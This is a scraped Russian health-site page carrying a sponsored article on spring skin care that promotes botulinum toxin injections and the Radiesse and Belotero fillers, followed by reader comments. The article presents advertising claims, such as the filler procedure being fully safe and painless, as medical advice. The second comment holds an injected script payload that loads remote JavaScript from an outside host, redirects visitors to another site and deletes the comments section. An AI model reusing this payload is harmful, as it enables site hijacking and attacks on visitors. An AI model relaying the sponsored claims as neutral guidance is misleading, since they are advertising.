Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Весеннее преображение вме...  >>  Весеннее преображение вместе с природой
 
Обратная связь
 

Весеннее преображение вместе с природой

Размер шрифта
27 марта 2012 17:22
  • google_analytics: false
  • Нравится

За время этой долгой зимы мороз и зимний ветер сделали свое дело. Лицо потеряло здоровый румянец, осунулось, кожа стала суше или наоборот жирней. Но именно весной хочется выглядеть как никогда потрясающе. Как исправить ситуацию? Правильно ухаживать за кожей: очищать и делать процедуры омоложения.

1 

Очищение кожи

Очищать кожу нужно два раза в день средствами, которые подходят именно вашему типу кожи. Обладательницам сухой кожи можно воспользоваться косметическими сливками, персиковым и миндальным маслом. Тем, у кого нормальная кожа, подойдут молочко и абрикосовое масло. Гели для умывания и масло виноградной косточки – это те средства, которые нужно использовать женщинам с жирной кожей.

Использование крема

Косметологи рекомендуют весной сменить схему использования кремов: утром, когда температура уже выше нуля, можно использовать увлажняющий крем, а вечером – питательный, но по текстуре и содержанию активных веществ питательный крем должен быть более легким. Хорошо, если в состав крема входят масла макадамии, лакричника, гидролизованные молочные протеины: они быстро впитываются в кожу, не оставляя жирного блеска.

Защита от солнечных лучей

Ошибается тот, кто считает, что солнце весной неактивное. Ранней весной еще не растаявший снег отражает яркие лучи – и у многих появляются веснушки. Ранней весной из-за высокой активности солнца и возможности появления пигментации нельзя делать глубокие пилинги. Защитит от пигментации крем с защитой от ультрафиолета.

Обратите внимание на состав: в нем не должно быть парааминобензойной кислоты, которая может вызвать сильную аллергию. Женщинам с сухой и чувствительной кожей лучше начинать пользоваться средствами для детей с факторами защиты не менее spf+30.

Стать молодой за считанные минуты

И все же никакой крем не сможет продемонстрировать быстрый и ошеломительный результат. На это способны лишь пластическая хирургия и менее радикальный метод – так называемые «уколы красоты». Самые популярные сегодня – препараты ботулоксина. Последнее поколение таких препаратов содержит только чистый нейротоксин: морщины разглаживаются, а лицо при этом сохраняет естественную мимику и подвижность. Чаще всего ботулотоксины используют для коррекции горизонтальных морщин лба, морщин межбровья и «гусиных лапок» около глаз.

Чтобы выглядеть по-настоящему молодо, надо восполнить объем мягких тканей, потерянный с возрастом из-за снижения выработки коллагена кожей. Кожа теряет эластичность и упругость, овал лица провисает, уголки рта опускаются, щеки становятся впалыми. Инновационный филлер Радиес сможет решить эту проблему за одну процедуру, которая длится чуть больше получаса. Радиес восполнит утраченный с возрастом объем мягких тканей лица в нужных местах. Глубокие морщины разгладятся, впалые и обвисшие скулы исчезнут, а овал лица подтянется. Эффект сохранится более чем на год. Радиес стимулирует выработку кожей собственного коллагена, и это принципиально отличает его от всех других существующих филлеров.

Процедура безопасна и безболезненна. Действующее вещество Радиеса – гидроксиапатит кальция. Он является естественным минеральным компонентом зубов и костей человека, поэтому он биологически совместим с тканями организма человека. Со временем он выводится без каких-либо последствий. И не забывайте про губы, которые со временем становятся более тонкими и бледными. Филлер на основе гиалуроновой кислоты Белотеро поможет вернуть свежесть и сочность губам.


Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Plusha

30 марта 2012 в 22:27

Цитировать   |   Пожаловаться

Что-то я не поняла, а как использовать масло для очищения кожи? Оно же жирное... Или его надо с чем-то смешать?

2 - zzzzzz

30 июня 2015 в 23:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Секрет самых красивых губ   Новое лекарство избавит вас от второго подбородка!   Мир гармонии, здоровья и долголетия   Гидроксиапатит кальция – революция в косметике? Или очередной обман?  

Слайдшоу

Постоянно потеете? Как жить дальше? 12 способов омоложения
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.